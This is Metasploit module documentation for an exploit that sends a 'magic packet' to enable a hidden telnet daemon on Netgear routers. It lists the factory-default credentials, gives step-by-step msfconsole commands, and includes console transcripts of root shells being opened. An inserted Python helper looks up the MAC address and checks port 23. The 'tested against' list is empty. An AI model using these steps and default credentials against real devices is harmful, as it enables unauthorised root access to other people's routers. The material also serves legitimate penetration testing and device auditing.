documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
Several models of Netgear devices have a hidden telnet daemon that can be enabled for remote LAN users by sending a 'magic packet' to the device. Upon successful connection, a root shell should be presented to the user.

There are many devices which contain this daemon; for a full list, see OpenWrt.

This module has been successfully tested against:
A MAC address is required for exploitation. To determine the MAC address of the device:

```
ping -c 1 [IP]
arp -an [IP]
```

If you are the root user, you can skip this step. ARP will be leveraged to find the MAC address.
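The following script is an added example (not part of the module or its documentation) that automates the unprivileged MAC lookup above by parsing `arp -an` output, and then reports whether the device is already accepting connections on TCP/23, which is the check an administrator would run on a router where this daemon is supposed to stay dormant. It assumes Linux `ping` (with `-W`) and the net-tools `arp` whose output matches the `? (ip) at mac [ether] on iface` form; the sample ARP text is constructed.

```python
import re
import socket
import subprocess
import sys

# One line of `arp -an` on Linux looks like:
#   ? (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
# An unresolved entry reads "at <incomplete>" and must yield no MAC.
ARP_LINE = re.compile(
    r"\((?P<ip>[\d.]+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE
)

# Constructed sample output (not captured from a real host), used for the self-check.
SAMPLE_ARP = (
    "? (192.168.1.1) at AA:BB:CC:DD:EE:FF [ether] on wlan0\n"
    "? (192.168.1.5) at <incomplete> on wlan0\n"
)


def parse_arp_mac(arp_output, ip):
    """Return the lower-cased MAC for `ip` from `arp -an` text, or None if absent/incomplete."""
    for line in arp_output.splitlines():
        m = ARP_LINE.search(line)
        if m and m.group("ip") == ip:
            return m.group("mac").lower()
    return None


def lookup_mac(ip):
    """Populate the ARP cache with one ping, then read the entry back without root."""
    subprocess.run(["ping", "-c", "1", "-W", "1", ip], capture_output=True)
    out = subprocess.run(["arp", "-an", ip], capture_output=True, text=True).stdout
    return parse_arp_mac(out, ip)


def telnet_port_open(ip, port=23, timeout=2.0):
    """True if something accepts TCP connections on `port`; the hidden telnetd should not."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"  # gateway IP used in the scenarios
    print("MAC:", lookup_mac(target) or "not found (host down or ARP entry incomplete)")
    print("TCP/23 open:", telnet_port_open(target))
```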
## Options

**Transport**

- 0 (Automatic): Detect if a device listens on TCP or UDP.
- 1 (TCP): Older devices usually listen on TCP.
- 2 (UDP): Newer devices usually listen on UDP.

**MAC**

Set this to the MAC address of the device. You can use ping and arp to find it. You can leave this blank if you're root.

**Username**

If this is an older device, it'll take the value of super_username in nvram, which is usually unchanged from Gearguy. If this is a newer device, it'll take the web UI username, which is usually unchanged from admin. You can leave this blank to use the default username.

**Password**

If this is an older device, it'll take the value of super_passwd in nvram, which is usually unchanged from Geardog. If this is a newer device, it'll take the web UI password, which is usually unchanged from password. You can leave this blank to use the default password.
1. `use exploit/linux/telnet/netgear_telnetenable`
2. `set rhost [IP]`
3. `set mac [MAC Address]` if not running as root
4. `exploit`

## Scenarios

As a normal user:

```
msf > use exploit/linux/telnet/netgear_telnetenable
msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.04 ms

--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms
msf exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1

? (192.168.1.1) at [redacted] [ether] on wlan0
msf exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.3:34833 -> 192.168.1.1:23) at 2018-03-02 19:26:25 -0600

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```
As root:

```
msf > use exploit/linux/telnet/netgear_telnetenable
msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
[+] 192.168.1.1:23 - Found MAC address [redacted]
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:37771 -> 192.168.1.1:23) at 2018-03-02 19:33:42 -0600

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```